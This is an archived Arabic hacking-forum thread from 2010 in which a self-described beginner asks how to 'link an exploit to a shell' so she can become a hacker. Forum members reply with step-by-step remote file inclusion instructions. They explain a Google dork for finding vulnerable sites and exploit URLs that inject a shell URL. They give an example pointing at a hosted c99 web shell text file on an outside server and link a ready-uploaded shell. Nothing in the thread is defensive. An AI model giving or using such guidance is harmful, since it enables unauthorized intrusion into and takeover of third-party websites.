أستفستار بعد أكتشاف الثغرهـ [الأرشيف]

مشاهدة النسخة كاملة : أستفستار بعد أكتشاف الثغرهـ

Mays

08-18-2010, 01:01 PM

عندي مشكله يا أروع جيوش

بدي منكم تعلموني

هيآ

أنوو أنا من بعد البحث والتعب والعناء أكتشفت أنوو لازم أطلع الثغره

وهذي الثغره الا شفتها من سكريبت مكتبة صوتيه

يعني
http://www.exploit-db.com/exploits/11171/
دخلت ع الإكس بلويت وشفت الثغره حقت السكريبت

بعدها وقف مخي وما عرفت وش أعمل

بليييييييييييييييييييييز فهموني

Mays

08-18-2010, 07:11 PM

فينكم

بلييييييييييييييييييزز

Mays

08-18-2010, 07:32 PM

ليش أنــآ بستفسر بدي إجآبه بلييييييييييييييييييييييي يييييييييييييييييز

Next dream

08-18-2010, 07:55 PM

السلام عليكم

اختي هذي الثغرة ما تستخدم بربط الشل

هذي تستخدم بالدوس

انتي كمبتدئه صعبه عليك

اما اذا تبين تربطين ثغرة بشل انا انصحك تستخدمين ثغرة فايل انكود

والسلام مسك الختام

Mays

08-18-2010, 08:14 PM

وعليكم السلام ورحمة الله وبركاته

هلا وغلا أستآذ

ممكن توضح لي إذآ تقول عن طريق أوآمر الدوس ممكن تعمل لي توضيح فيه لأنووو بدي أكون خطنطيرة

وإذآ مآ عليك كلافه أستآذ تشرح لي كيف أصيد ثغره الفايل إنكود

لأنوو وضعت عنوان السكريبت حق الموقع في الاكسبوليت وطلعت لي هالثغره يعني ياريتك توضح لي شلون أربطها بالشل

أبي طريقه أربط الثغره بالشل

Mays

08-18-2010, 08:17 PM

طيب أستاذ وهذي الثغره شلون أربطها بالشل

توني شايفتها

http://www.exploit-db.com/exploits/12229/

هل بالدوس كمان ولا كيف .؟

Next dream

08-18-2010, 10:29 PM

هلا بك اختي هذي نفس الثغرة الي فوق

انا انصحك بدورة HcJ لان يوجد شروح لها

اما بالنسبه لفايل انكود

انا اعطيك ثغرة فايل انكود http://www.exploit-db.com/exploits/14672/ هذي ثغرة فايل انكود

خليني اشرحا لك

حلو هذي الثغرة ابي اشرح لك المفيد فيها

Dork: Powered by free simple software

اوك هذئ هو دورك البحث يعني تنسخين Powered by free simple software

وتلصقينه في قوقل وتسوين بحث اكيد حتحصلين مواقع مصابه

هذا الاستغلال طيب
site =الموقع المصاب مثل www.aljyyosh.com
path =هذي انا اقولك مثل موقع الجيوش في بي يعني زي كذا vb
[Shell URL] =هذا تحطين مكانه رابط الشل يكون بضيغه txt
وفي نهايه الشل تحطين ؟
http://site/path/themes/default/index.php?meta=[Shell URL]?

http://site/path/themes/default/index.php?phpincdir=[Shell URL]?

يعني يطلع لنا الرابط زي كذا
www.aljyyosh.com/vb/themes/default/index.php?phpincdir=shell?

وبالتوفق

اتمنئ ان اكون افدتك بشي

تقبلي فاق تحياتي

اخوك :Next dream

Mays

08-18-2010, 11:00 PM

طيب آستآذ ممكن تصور لي عملية البحث في قوقل وتآشر لي آي موقع مصآب كي آتمم العمليه بليييييييييييز

Mays

08-18-2010, 11:06 PM

آستآذ ممكن تشرح لي النقطتين هذي

http://site/path/themes/default/index.php?meta=[Shell URL]?

http://site/path/themes/default/index.php?phpincdir=[Shell URL]?

بلييييز

آلشل عندي جآهز بس آبي آربطه بثغرة وآكون هكر وآحط موضوع بالانجآزآت :$

millen!um

08-19-2010, 04:26 AM

السلام عليكم

http://site/path/themes/default/index.php?meta=[Shell URL]?
طبعا
site هو إسم الموقع مثال google
path
هو الفولدر أو الملف إلي فيه الثغرة
الشل تحطي الرابط مكان
[Shell URL]
رابط الشل يعني و لازم يكون بصيغة txt لأن ثغرة الأنكلود هي خطأ موجود بالسكربت
بعد رابط الشل علامة إستفهام
مثال ل
google

http://google.com/path/themes/default/index.php?meta=http://h1.ripway.com/mooha/c99.php.txt ?

طبعا قوقل لا يحوي هذه الثغرة
و أخيرا لا تعولي على ثغرات الريموت فايل أنكلود كثيرا لأن هذه الثغرة نــــــــــــادرة جدا جدا

و هذا شل مرفوع بصيغة تكست لهذا النوع من الثغرات

http://h1.ripway.com/mooha/c99.php.txt
و السلام عليكم و رحمة الله و بركاته
ملاحظة مهمة لتصبحي محترفة إبقي في الجيوش